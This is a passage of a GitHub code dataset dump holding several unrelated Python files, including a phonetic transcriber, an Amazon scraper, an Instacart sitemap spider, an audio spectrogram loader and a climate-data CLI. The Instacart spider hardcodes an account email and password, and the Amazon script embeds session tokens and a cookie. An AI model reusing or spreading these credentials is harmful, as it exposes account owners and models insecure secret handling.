"call"}, {"api_name": "numpy.argmin", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "5102240202", "text": "from datetime import datetime, timedelta\n\na = int(input())\nb = int(input())\nc = int(input())\n\nlist = (a, b, c)\nresult = sum(list)\n\ntime = datetime(2020, 3, 22) \ndelta = timedelta( seconds = result)\nprint(str(delta)[slice(3, 10)])\n\n\n# 35, 45, 44 \n# 22, 7, 34\n# 50, 50, 49\n", "repo_name": "byAbaddon/Basics-Course-Python-March-2020", "sub_path": "3.1 Condition Statments Exersise/01-sum-seconds.py", "file_name": "01-sum-seconds.py", "file_ext": "py", "file_size_in_byte": 271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime", "line_number": 10, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "7297207632", "text": "\r\n'''\r\nTool that helps in phonetic transcription. Enter a text and it will transcribe it automatically without considering the weak forms.\r\n'''\r\nimport requests\r\nimport re\r\nimport nltk\r\nimport argparse\r\nfrom pathlib import Path\r\n\r\n# TODO: implement -i as user input for text files and -o as user output (as a .txt file)\r\n# TODO: implement a loading bar that would take a total number of words and show the speed and eta\r\n# TODO: eventually more object-oriented to speed up the script; store the already fetched data \r\n\r\ndef arg_parse():\r\n parser = argparse.ArgumentParser(\r\n prog='phonetic_transcriber.py',\r\n description='Tool that helps in phonetic transcription. Enter a text or a file as input (-i) and it will transcribe it automatically without considering the weak forms.')\r\n parser.add_argument(\"-input\", \"-i\", type=Path, required=False, help=\"Type in the path to the file that you want to transcribe; i.e.: -i ~/my_text.txt\")\r\n args = parser.parse_args()\r\n \r\n if args.input:\r\n print(f'File path provided: {args.input}, processing...')\r\n return args\r\n else:\r\n print('No file path provided. Proceeding with typed text.')\r\n\r\ndef file_reader(text_file) -> str:\r\n with open(text_file, 'r') as read_file:\r\n content = read_file.read()\r\n return content\r\n\r\ndef punctuation_removal(input) -> list:\r\n tokenizer = nltk.RegexpTokenizer(r\"\\b\\w+(?:'\\w+)?\\b\")\r\n words_without_punctuation = tokenizer.tokenize(input.lower())\r\n return words_without_punctuation\r\n\r\ndef transcribe():\r\n args = arg_parse()\r\n # Check if file has been inserted\r\n if args == None:\r\n raw_input = input(\"Please insert the word in English that you want to be transcribed!\\n\")\r\n else:\r\n text_file = args.input.expanduser()\r\n raw_input = file_reader(text_file)\r\n\r\n final_phonetic_transcription = '/ '\r\n \r\n # TODO: fix the edgecase 'i'; eventually find a better way to search for 'phonetic' key\r\n # TODO: apply json for better script management\r\n\r\n for word in punctuation_removal(raw_input):\r\n get_data = requests.get(f'{dictionary_url}{word}')\r\n if get_data.status_code == 200:\r\n store_data = get_data.json()\r\n # different methods to find the phonetic transcription in the generated .json\r\n try:\r\n phonetics_string = store_data[0]['phonetics']\r\n phonetic_transcription = phonetics_string[1]['text']\r\n except IndexError:\r\n phonetic_transcription = store_data[0]['phonetic']\r\n finally:\r\n escape_char = re.escape('/') \r\n final_phonetic_transcription = final_phonetic_transcription + re.sub(escape_char, '', phonetic_transcription) + ' '\r\n elif get_data.status_code == 404:\r\n print(f'Sorry, word \"{word}\" not found.') \r\n else: \r\n print(f'API request failed with status code {get_data.status_code}')\r\n\r\n final_phonetic_transcription += '/'\r\n print(final_phonetic_transcription)\r\n\r\n# add X-SAMPA dictionary for its later conversion\r\n x_sampa = {\r\n \"ɪ\": \"I\",\r\n \"æ\": \"{\",\r\n \"ʌ\": \"V\",\r\n \"ə\": \"@\",\r\n \"ɜ\": \"E\",\r\n \"ɑ\": \"A\",\r\n \"ɒ\": \"Q\",\r\n \"ɔ\": \"O\",\r\n \"ʊ\": \"U\",\r\n \"θ\": \"T\",\r\n \"ð\": \"D\",\r\n \"ʃ\": \"S\",\r\n \"ʒ\": \"Z\",\r\n \"ŋ\": \"N\"\r\n }\r\n\r\n final_phonetic_transcription_x_sampa = ''\r\n for character in final_phonetic_transcription:\r\n if character in x_sampa:\r\n character = x_sampa[character]\r\n final_phonetic_transcription_x_sampa += character\r\n else:\r\n final_phonetic_transcription_x_sampa += character \r\n print(final_phonetic_transcription_x_sampa)\r\n\r\nif __name__ == '__main__':\r\n# Download nltk resources (if not already downloaded)\r\n nltk.download('punkt')\r\n dictionary_url = 'https://api.dictionaryapi.dev/api/v2/entries/en/'\r\n transcribe()", "repo_name": "vaex91/phonetic_transcription", "sub_path": "phonetic_transcriber.py", "file_name": "phonetic_transcriber.py", "file_ext": "py", "file_size_in_byte": 3981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "name"}, {"api_name": "nltk.RegexpTokenizer", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 53, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 63, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 64, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "73886526275", "text": "# encoding='utf-8\n\n# @Time: 2023-01-28\n# @File: %\n#!/usr/bin/env\nimport requests\nfrom icecream import ic\nimport os\nos.chdir(os.path.abspath(os.path.dirname(__file__)))\n# change cwd to current file dir\n\nsession = requests.Session()\n\n# ==================== 1.0 US code session====================\nheaders = {\n 'authority': 'www.amazon.com',\n 'accept': 'text/html,*/*',\n 'accept-language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'anti-csrftoken-a2z': 'gDseJ7z1FruolG1l4bRc7Z6eaMQThpfuuX3LmqwAAAAMAAAAAGPVKNVyYXcAAAAA;hO1bhlKylde6GiGaBm2Asx6WCdde+IjCu8HRgBY1LQNTAAAAAGPVKNUAAAAB',\n 'cache-control': 'no-cache',\n 'content-type': 'application/json',\n # 'cookie': 'session-id=141-8324378-3408564; session-id-time=2082787201l; i18n-prefs=USD; skin=noskin; ubid-main=133-9964420-2947024; session-token=\"4uvVDwnTor/E4Itenk4LSD2wBNatL5zSkdwVX6lVtnc2R8PbWwWpjWR53v7PtIQmPtrWCg4tHeZ2g8WIPU4MQ8Zz7fYDpRRkuch33Aj/zRteDQJx++Q7+36ZGp8CANYsDWCtD9ofUxlSuw9xYuGGFgwDja8UsmztEAWAUQPy7jyIcSvn2pM/jJ3cl+xLPXv2NrHq8oTah3Kv4D/FDzAcrQ/7HJrRgD8ci7I5T5QkXo4=\"; csm-hit=tb:JD25YD8VDSHNBJQP7MS5+s-JD25YD8VDSHNBJQP7MS5|1674914117160&t:1674914117160&adb:adblk_no',\n 'device-memory': '4',\n 'downlink': '1.3',\n 'dpr': '0.8',\n 'ect': '3g',\n 'origin': 'https://www.amazon.com',\n 'pragma': 'no-cache',\n 'referer': 'https://www.amazon.com/',\n 'rtt': '350',\n 'sec-ch-device-memory': '4',\n 'sec-ch-dpr': '0.8',\n 'sec-ch-ua': '\"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\", \"Google Chrome\";v=\"108\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"Linux\"',\n 'sec-ch-ua-platform-version': '\"5.15.82\"',\n 'sec-ch-viewport-width': '893',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',\n 'viewport-width': '893',\n 'x-requested-with': 'XMLHttpRequest',\n}\n\nparams = (\n ('actionSource', 'glow'),\n)\n\ndata = '{\"locationType\":\"LOCATION_INPUT\",\"zipCode\":\"52325\",\"storeContext\":\"generic\",\"deviceType\":\"web\",\"pageType\":\"Gateway\",\"actionSource\":\"glow\"}'\n\n# add headers to session\nsession.headers.update(headers)\n\nresponse = session.post('https://www.amazon.com/portal-migration/hz/glow/address-change',\n params=params, data=data)\n# print(response.text)\n\n# NB. Original query string below. It seems impossible to parse and\n# reproduce query strings 100% accurately so the one below is given\n# in case the reproduced version is not \"correct\".\n# response = requests.post('https://www.amazon.com/portal-migration/hz/glow/address-change?actionSource=glow', headers=headers, data=data)\n# ==================== 2.0 get items list====================\n\n\nparams = (\n ('k', 'macbook case'),\n ('crid', '1YWGI5BSFG866'),\n ('sprefix', 'macbook case,aps,553'),\n ('ref', 'nb_sb_noss_1'),\n)\n\nresponse = session.get('https://www.amazon.com/s', params=params)\n# with open('macbook_case.html', 'w') as f:\n# f.write(response.text)\n\n# NB. Original query string below. It seems impossible to parse and\n# reproduce query strings 100% accurately so the one below is given\n# in case the reproduced version is not \"correct\".\n# response = requests.get('https://www.amazon.com/s?k=macbook+case&crid=1YWGI5BSFG866&sprefix=macbook+case%2Caps%2C553&ref=nb_sb_noss_1', headers=headers)\n", "repo_name": "yuzhegan/spider", "sub_path": "amazon/Amz.py", "file_name": "Amz.py", "file_ext": "py", "file_size_in_byte": 3384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "7055987195", "text": "import datetime\n\nfrom pymongo import MongoClient\n\nclient = MongoClient('localhost', 27017)\ndb = client['Hogwarts']\ncollection = db['students']\n\n\nmagic_skills = ['Animagi', 'Metamorphmagi',\n 'Parseltongue', 'Seers',\n 'Legilimency and Occlumency',\n 'Apparition and Disapparition',\n 'Teleportation', 'Veela Charm',\n 'Magical Resistence']\n\nall_courses = ['Transfiguration',\n 'Defence Against the Dark Arts',\n 'Charms', 'Potion', 'Astronomy',\n 'History of Magic', 'Herbology',\n 'Arithmancy', 'Study of Ancient Runes',\n 'Divination', 'Care of Magical Creatures',\n 'Muggle Studies', 'Alchemy', 'Flying',\n 'Apparition']\n\nstudent = {\"first_name\": \"Jenna\",\n \"last_name\": \"Kayla\",\n \"creation_time\": datetime.datetime.now(),\n \"update_time\": datetime.datetime.now(),\n \"existing_skills\": {magic_skills[2]: 3},\n \"desired_skills\": {magic_skills[4]: 5},\n \"interested_in_courses\": [all_courses[3]]\n }\n\n\nstudent_id = collection.insert_one(student)", "repo_name": "selimmizrahi/Hogwarts_project", "sub_path": "db/addUser.py", "file_name": "addUser.py", "file_ext": "py", "file_size_in_byte": 1171, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymongo.MongoClient", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "41790996995", "text": "import csv\nfrom urlparse import urljoin\n\nimport requests\nfrom lxml import etree\n\nfrom . import SitemapSpider, SitemapSpiderError\n\n\nclass InstacartSitemapSpider(SitemapSpider):\n retailer = 'instacart.com'\n\n default_login = 'final.fantasy.dev@gmail.com'\n default_password = 'haha123.'\n default_store = 'costco'\n\n home_url = 'https://www.instacart.com/'\n sign_in_url = 'https://www.instacart.com/accounts/login'\n retailers_url = 'https://www.instacart.com/v3/retailers'\n departments_url = 'https://www.instacart.com/v3/retailers/{retailer_id}/containers'\n department_url = 'https://www.instacart.com/v3/containers/{container}'\n item_url = 'https://www.instacart.com/store/items/{item_id}'\n\n def task_sitemap_to_item_urls(self, options):\n session = self._sign_in(options)\n\n retailer_id = self._get_retailer_id(options, session)\n if not retailer_id:\n raise SitemapSpiderError('Store not found')\n\n departments = self._get_departments(retailer_id, session)\n\n with open(self.get_file_path_for_result('item_urls.csv'), 'w') as item_urls_file:\n item_urls_csv = csv.writer(item_urls_file)\n\n item_ids_seen = set()\n\n for department in departments:\n for item_id in self._load_items(department, session):\n if item_id not in item_ids_seen:\n item_url = self.item_url.format(item_id=item_id)\n\n item_urls_csv.writerow([item_url])\n item_ids_seen.add(item_id)\n\n def _sign_in(self, options):\n self.logger.info('Authentication..')\n\n session = requests.Session()\n\n response = session.get(self.home_url)\n self._check_response(response, raise_error=True, session=session)\n\n tree = etree.HTML(response.content)\n token = tree.xpath(\".//meta[@name='csrf-token']/@content\")\n\n if token:\n token = token[0]\n else:\n raise SitemapSpiderError('Can not parse auth token')\n\n login = options.get('login') or self.default_login\n password = options.get('password') or self.default_password\n\n sign_in_data = {\n 'user': {\n 'email': login,\n 'password': password\n },\n 'authenticity_token': token\n }\n\n response = session.post(self.sign_in_url, json=sign_in_data, headers={'Accept': 'application/json'})\n self._check_response(response, raise_error=True, session=session)\n\n self.logger.info('Success')\n\n return session\n\n def _get_retailer_id(self, options, session):\n store = options.get('store') or self.default_store\n self.logger.info('Loading retailer id for store: {}'.format(store))\n\n response = session.get(self.retailers_url)\n self._check_response(response, raise_error=True, session=session)\n\n retailers = response.json().get('retailers')\n if not retailers:\n raise SitemapSpiderError('List of retailers is empty')\n\n for retailer in retailers:\n if store in (retailer.get('slug'), retailer.get('name')):\n return retailer.get('id')\n\n def _get_departments(self, retailer_id, session):\n self.logger.info('Loading departments for retailer id: {}'.format(retailer_id))\n\n response = session.get(self.departments_url.format(retailer_id=retailer_id))\n self._check_response(response, raise_error=True, session=session)\n\n containers = response.json().get('containers')\n if not containers:\n raise SitemapSpiderError('List of departments is empty')\n\n departments = []\n\n while True:\n if not containers:\n break\n\n container = containers.pop(0)\n\n if 'virtual' not in container.get('attributes', []):\n departments.append(container.get('path'))\n\n if container.get('containers'):\n containers.extend(container['containers'])\n\n return departments\n\n def _load_items(self, department, session):\n self.logger.info('Loading items for department: {}'.format(department))\n\n response = session.get(self.department_url.format(container=department))\n self._check_response(response, raise_error=True, session=session)\n\n modules = response.json().get('container', {}).get('modules')\n if not modules:\n raise SitemapSpiderError('List of modules is empty')\n\n start_url = self._get_start_url(modules)\n\n if start_url:\n start_url = urljoin(self.home_url, start_url)\n\n self.logger.info('Scraping shelf page: {}'.format(start_url))\n\n next_page = 1\n\n while next_page:\n self.logger.info('Page: {}'.format(next_page))\n\n response = session.get(start_url, params={'page': next_page, 'per': 30})\n self._check_response(response, raise_error=True, session=session)\n\n data = response.json().get('module_data', {})\n\n for item in data.get('items', []):\n yield item.get('id')\n\n next_page = data.get('pagination', {}).get('next_page')\n else:\n self.logger.warn('There is not shelf url')\n\n def _get_start_url(self, modules):\n for mod in modules:\n if 'items_grid' in mod.get('types', []):\n return mod.get('async_data_path')\n", "repo_name": "aprosdev/ecom-predictor", "sub_path": "sitemap_utilities/sitemap_service/app/spiders/instacart.py", "file_name": "instacart.py", "file_ext": "py", "file_size_in_byte": 5459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.writer", "line_number": 34, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 49, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 54, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 54, "usage_type": "name"}, {"api_name": "urlparse.urljoin", "line_number": 134, "usage_type": "call"}]} +{"seq_id": "15495380749", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = np.loadtxt('RV_data.txt',skiprows=17, usecols=(0,1,2,3,4))\nBJD = data[:,0] #Barycentric Julian Date\nRad_velocity = data[:,1] #Radial velocity\nRV_uncertainty = data[:,2] #Uncertainty in target radial velocity\nBisector_Span = data[:,3] #bisector span\nBS_uncertainty = data[:,4] #uncertainty in bisector span\n\nPeriod = 3.5485 #days\nt_0 = BJD[0]\nfolded_time = np.zeros_like(BJD)\n\nfor i in range(len(BJD)):\n folded_time[i] = (BJD[i] - t_0) % Period\n \nfreq = (2*np.pi)/Period\nphase = 1.5\namp = Rad_velocity[0]\n\ndef sine(amp,freq,time,phase):\n '''\n sine model to fit to the points\n -----\n parameters:\n amp: amplitude of sine wave\n freq: frequency of sine wave\n time: list of time of the data\n phase: phase of sine wave\n '''\n model = np.zeros_like(time)\n for i in range(len(time)):\n model[i] = amp*np.sin(freq*time[i] + phase)\n return model\n\nplt.plot(folded_time, Rad_velocity, '.')\n#fitted plot \nplt.plot(sorted(folded_time), sine(amp,freq,sorted(folded_time),phase), 'g', label='after fitting')\nplt.ylim(-300, 200)\nplt.xlabel('Time BJD')\nplt.ylabel('Radial Velocity')\nplt.title('Keck-HIRES Radial Velocity Data')\nplt.savefig('hw7bonusplot.png')", "repo_name": "SarahV4775/Comp.-Meth.-for-Astrophysics-HW", "sub_path": "HW 7/HW7bonus.py", "file_name": "HW7bonus.py", "file_ext": "py", "file_size_in_byte": 1306, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.loadtxt", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "19846313177", "text": "import csv\nimport wave\nfrom scipy.io import wavfile\nimport numpy as np\nimport os\nfrom scipy import signal\nfrom scipy.signal import stft\nimport matplotlib.pyplot as plt\nfrom glob import glob\nimport pyaudio\nimport wave\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport random\nfrom keras.utils import to_categorical\n\n# open folders -> take files .wav\n# wav -> spectrograms\n# save spectrograms in folders\n# load data to train/validate/test\n\nFS = 44100\n\nclass DataLoader():\n\n def generate_data(self):\n DIR = 'data'\n wav_files = glob(os.path.join(DIR, '*/*wav'))\n wav_files = [x.split(sep='\\\\')[1] + '/' + x.split(sep='\\\\')[2] for x in wav_files]\n data = []\n\n for e in wav_files:\n label, name = e.split('/')\n file = os.path.join(DIR, e)\n f, t, Zxx = self.wave_to_spec(file)\n # Jesli jest dluzy od 100 ramek\n # if Zxx.shape[1] > 100:\n print(\"[\", Zxx.shape[0], ' ,', Zxx.shape[1], \"]\")\n filepath = os.path.join(DIR, label, 'data_csv')\n self.save_spec_to_csv(Zxx, filepath, name)\n # self.plot_spectrogram(f, t, Zxx, file)\n # else:\n # continue\n\n # normalization\n def normalize(self, data):\n data = data / np.max(data)\n return data\n\n # audio file that's shorter than 44100 samples is filled with 0's\n def pad_audio(self, y, fs):\n if len(y) >= fs: return y\n else: return np.pad(y, pad_width=(fs - len(y), 0), mode='constant', constant_values=(0,0))\n\n # audio file that is longer than 44100 is randomly cut to 1s duration\n def chop_audio(self, y, fs):\n if len(y) <= fs: return y\n else:\n beginSample = np.random.randint(0, len(y) - fs)\n return y[beginSample : (beginSample + fs)]\n\n # preemphasis filtering\n def preemphasis_filtering(self, data, pre_emphasis=0.97):\n pre_emphasis = 0.97\n data = np.append(data[0], data[1:] - pre_emphasis * data[:-1])\n return data\n\n def read_wave(self, wav_name):\n obj = wave.open(wav_name, 'r')\n num_of_channels = obj.getnchannels()\n if num_of_channels == 1:\n fs, y = wavfile.read(wav_name)\n return fs, y\n\n # fs=44100\n def wave_to_spec(self, wav_name, bLog_spec=True, threshold_freq_down = None, threshold_freq_up = None):\n fs, y = self.read_wave(wav_name)\n # resampling\n if fs != 16000:\n # (signal, amount of samples in resampled signal)\n print(fs)\n fs_new = 16000\n y = signal.resample(y, int((fs_new/fs) * y.shape[0]))\n print('Nowa długość sygnału: ', len(y))\n fs = fs_new\n y = self.pad_audio(y, fs)\n y = self.chop_audio(y, fs)\n y = self.normalize(y)\n y = self.preemphasis_filtering(y)\n y = self.change_zero_to_something_small(y)\n # STFT\n f, t, Zxx = stft(y, fs, window='hann')\n # LOW PASS\n if threshold_freq_up is not None:\n Zxx = Zxx[f <= threshold_freq_up, :]\n f = f[f <= threshold_freq_up]\n # HIGH PASS\n if threshold_freq_down is not None:\n Zxx = Zxx[f >= threshold_freq_down, :]\n f = f[f >= threshold_freq_down]\n # Logarithm of spectrogram\n if bLog_spec:\n Zxx_log = np.log(np.abs(Zxx))\n return f, t, Zxx_log\n else:\n return f, t, Zxx\n\n def plot_spectrogram(self, f, t, Zxx, name):\n plt.pcolormesh(t, f, Zxx)\n plt.title(name)\n plt.show()\n\n def change_zero_to_something_small(self, x):\n for i in range(len(x)):\n if x[i] == 0:\n x[i] = random.uniform(0.0000001, 0.0000002)\n return x\n\n def save_spec_to_csv(self, Zxx, filepath, filename):\n if not os.path.isdir(filepath):\n os.mkdir(filepath)\n print(\"Successfully created the directory %s\" % filepath)\n\n # CSV\n with open((filepath + '\\\\' + filename + '.csv'), \"w+\", newline='') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter=' ')\n csv_writer.writerows(Zxx)\n\ndl = DataLoader()\ndl.generate_data()", "repo_name": "zhangwq740/CNN-speech-classification", "sub_path": "DataLoader.py", "file_name": "DataLoader.py", "file_ext": "py", "file_size_in_byte": 4232, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "glob.glob", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.append", "line_number": 65, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 69, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.read", "line_number": 72, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 72, "usage_type": "name"}, {"api_name": "scipy.signal.resample", "line_number": 83, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 83, "usage_type": "name"}, {"api_name": "scipy.signal.stft", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pcolormesh", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 121, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "70264197636", "text": "from collections import defaultdict\nimport logging\nimport os\nfrom pathlib import Path\nimport re\nimport subprocess\nimport sys\nimport yaml\n\nfrom codetiming import Timer\nimport typer\nimport xarray as xr\n\nfrom mlde_utils import VariableMetadata\nfrom .options import DomainOption, CollectionOption\nfrom ..moose import (\n VARIABLE_CODES,\n raw_nc_filepath,\n processed_nc_filepath,\n remove_forecast,\n remove_pressure,\n)\nfrom ..preprocessing.coarsen import Coarsen\nfrom ..preprocessing.constrain import Constrain\nfrom ..preprocessing.diff import Diff\nfrom ..preprocessing.regrid import Regrid\nfrom ..preprocessing.remapcon import Remapcon\nfrom ..preprocessing.select_domain import SelectDomain\nfrom ..preprocessing.shift_lon_break import ShiftLonBreak\nfrom ..preprocessing.sum import Sum\nfrom ..preprocessing.vorticity import Vorticity\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO, format=\"%(levelname)s %(asctime)s: %(message)s\")\n\napp = typer.Typer()\n\n\n@app.callback()\ndef callback():\n pass\n\n\ndef get_variable_resolution(config, collection):\n if config[\"sources\"][\"type\"] == \"moose\":\n if collection == CollectionOption.cpm:\n variable_resolution = \"2.2km\"\n elif collection == CollectionOption.gcm:\n variable_resolution = \"60km\"\n else:\n raise f\"Unknown collection {collection}\"\n elif config[\"sources\"][\"type\"] == \"bp\":\n # assume bp sourced data is at the desired resolution already\n if collection == CollectionOption.cpm:\n variable_resolution = \"2.2km-coarsened-gcm\"\n elif collection == CollectionOption.gcm:\n variable_resolution = \"60km\"\n else:\n raise f\"Unknown collection {collection}\"\n\n return variable_resolution\n\n\ndef get_sources(\n config,\n collection,\n year,\n data_basedir,\n domain,\n target_size,\n variable_resolution,\n target_resolution,\n ensemble_member,\n):\n sources = {}\n\n if config[\"sources\"][\"type\"] == \"moose\":\n if collection == CollectionOption.cpm:\n source_domain = \"uk\"\n elif collection == CollectionOption.gcm:\n source_domain = \"global\"\n else:\n raise f\"Unknown collection {collection}\"\n # ds = xr.open_mfdataset([raw_nc_filepath(variable=source, year=year, frequency=frequency) for source in config['sources']['moose']])\n # for source in config['sources']['moose']:\n # if \"moose_name\" in VARIABLE_CODES[source]:\n # logger.info(f\"Renaming {VARIABLE_CODES[source]['moose_name']} to {source}...\")\n # ds = ds.rename({VARIABLE_CODES[source][\"moose_name\"]: source})\n\n for src_variable in config[\"sources\"][\"variables\"]:\n source_nc_filepath = raw_nc_filepath(\n variable=src_variable[\"name\"],\n year=year,\n frequency=src_variable[\"frequency\"],\n resolution=variable_resolution,\n collection=collection.value,\n domain=source_domain,\n ensemble_member=ensemble_member,\n )\n logger.info(f\"Opening {source_nc_filepath}\")\n ds = xr.open_dataset(source_nc_filepath)\n\n if \"moose_name\" in VARIABLE_CODES[src_variable[\"name\"]]:\n logger.info(\n f\"Renaming {VARIABLE_CODES[src_variable['name']]['moose_name']} to {src_variable['name']}...\"\n )\n ds = ds.rename(\n {\n VARIABLE_CODES[src_variable[\"name\"]][\n \"moose_name\"\n ]: src_variable[\"name\"]\n }\n )\n\n # remove forecast related coords that we don't need\n ds = remove_forecast(ds)\n # remove pressure related dims and encoding data that we don't need\n ds = remove_pressure(ds)\n\n sources[src_variable[\"name\"]] = ds\n elif config[\"sources\"][\"type\"] == \"bp\":\n for src_variable in config[\"sources\"][\"variables\"]:\n source_metadata = VariableMetadata(\n data_basedir,\n frequency=src_variable[\"frequency\"],\n domain=f\"{domain.value}-{target_size}\",\n resolution=f\"{variable_resolution}-{target_resolution}\",\n ensemble_member=ensemble_member,\n variable=src_variable[\"name\"],\n )\n source_nc_filepath = source_metadata.filepath(year)\n logger.info(f\"Opening {source_nc_filepath}\")\n ds = xr.open_dataset(source_nc_filepath)\n\n ds = remove_pressure(ds)\n\n sources[src_variable[\"name\"]] = ds\n else:\n raise RuntimeError(f\"Unknown souce type {config['sources']['type']}\")\n\n logger.info(f\"Combining {config['sources']}...\")\n ds = xr.combine_by_coords(\n sources.values(),\n compat=\"no_conflicts\",\n combine_attrs=\"drop_conflicts\",\n coords=\"all\",\n join=\"inner\",\n data_vars=\"all\",\n )\n\n return ds\n\n\n@app.command()\n@Timer(name=\"create-variable\", text=\"{name}: {minutes:.1f} minutes\", logger=logger.info)\ndef create(\n config_path: Path = typer.Option(...),\n year: int = typer.Option(...),\n frequency: str = \"day\",\n domain: DomainOption = DomainOption.london,\n scenario=\"rcp85\",\n scale_factor: str = typer.Option(...),\n target_resolution: str = \"2.2km\",\n target_size: int = 64,\n ensemble_member: str = typer.Option(...),\n):\n \"\"\"\n Create a new variable from moose data\n \"\"\"\n with open(config_path, \"r\") as config_file:\n config = yaml.safe_load(config_file)\n\n # add cli parameters to config\n config[\"parameters\"] = {\n \"frequency\": frequency,\n \"domain\": domain.value,\n \"scenario\": scenario,\n \"scale_factor\": scale_factor,\n \"target_resolution\": target_resolution,\n }\n\n data_basedir = 